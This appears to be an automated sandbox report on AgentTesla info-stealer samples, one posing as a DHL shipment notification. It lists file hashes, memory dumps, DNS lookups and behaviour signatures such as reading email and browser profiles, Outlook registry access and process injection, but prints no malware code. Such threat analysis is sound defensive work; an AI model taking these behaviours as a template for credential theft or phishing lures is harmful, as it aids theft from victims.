"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"
C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/3056-0-0x00000000750BE000-0x00000000750BF000-memory.dmp
memory/3056-1-0x00000000004F0000-0x00000000005DE000-memory.dmp
memory/3056-2-0x00000000053A0000-0x0000000005944000-memory.dmp
memory/3056-3-0x0000000004E90000-0x0000000004F22000-memory.dmp
memory/3056-5-0x00000000750B0000-0x0000000075860000-memory.dmp
memory/3056-4-0x0000000005030000-0x000000000503A000-memory.dmp
memory/3056-6-0x0000000005390000-0x00000000053A0000-memory.dmp
memory/3056-7-0x00000000750BE000-0x00000000750BF000-memory.dmp
memory/3056-8-0x00000000750B0000-0x0000000075860000-memory.dmp
memory/3056-9-0x00000000078A0000-0x000000000793C000-memory.dmp
memory/3056-10-0x0000000007940000-0x0000000007A0C000-memory.dmp
memory/3056-11-0x0000000007A30000-0x0000000007A7E000-memory.dmp
memory/3448-12-0x0000000000400000-0x000000000043C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL SHIPMENT NOTIFICATION 284748395PD.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
memory/3448-15-0x00000000750B0000-0x0000000075860000-memory.dmp
memory/3056-16-0x00000000750B0000-0x0000000075860000-memory.dmp
memory/3448-17-0x00000000750B0000-0x0000000075860000-memory.dmp
memory/3448-18-0x00000000056C0000-0x00000000056D8000-memory.dmp
memory/3448-19-0x00000000062C0000-0x0000000006326000-memory.dmp
memory/3448-20-0x00000000750B0000-0x0000000075860000-memory.dmp
memory/3448-21-0x00000000750B0000-0x0000000075860000-memory.dmp
memory/3448-22-0x00000000052D0000-0x0000000005320000-memory.dmp
memory/3448-23-0x00000000750B0000-0x0000000075860000-memory.dmp
memory/3448-24-0x00000000750B0000-0x0000000075860000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
128s
Max time network
121s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1812 set thread context of 764 | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\EZ0496.exe
"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"
C:\Users\Admin\AppData\Local\Temp\EZ0496.exe
"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"
Network
Files
memory/1812-0-0x0000000074ACE000-0x0000000074ACF000-memory.dmp
memory/1812-1-0x0000000000D00000-0x0000000000DCA000-memory.dmp
memory/1812-2-0x0000000074AC0000-0x00000000751AE000-memory.dmp
memory/1812-3-0x0000000000200000-0x000000000020E000-memory.dmp
memory/1812-4-0x0000000074ACE000-0x0000000074ACF000-memory.dmp
memory/1812-5-0x0000000074AC0000-0x00000000751AE000-memory.dmp
memory/1812-6-0x00000000055B0000-0x000000000566C000-memory.dmp
memory/1812-7-0x00000000007F0000-0x000000000082C000-memory.dmp
memory/764-9-0x0000000000400000-0x000000000043C000-memory.dmp
memory/764-8-0x0000000000400000-0x000000000043C000-memory.dmp
memory/764-10-0x0000000000400000-0x000000000043C000-memory.dmp
memory/764-14-0x0000000000400000-0x000000000043C000-memory.dmp
memory/764-12-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/764-11-0x0000000000400000-0x000000000043C000-memory.dmp
memory/764-18-0x0000000000400000-0x000000000043C000-memory.dmp
memory/764-19-0x0000000074AC0000-0x00000000751AE000-memory.dmp
memory/764-16-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1812-20-0x0000000074AC0000-0x00000000751AE000-memory.dmp
memory/764-21-0x0000000074AC0000-0x00000000751AE000-memory.dmp
memory/764-22-0x0000000074AC0000-0x00000000751AE000-memory.dmp
memory/764-23-0x0000000074AC0000-0x00000000751AE000-memory.dmp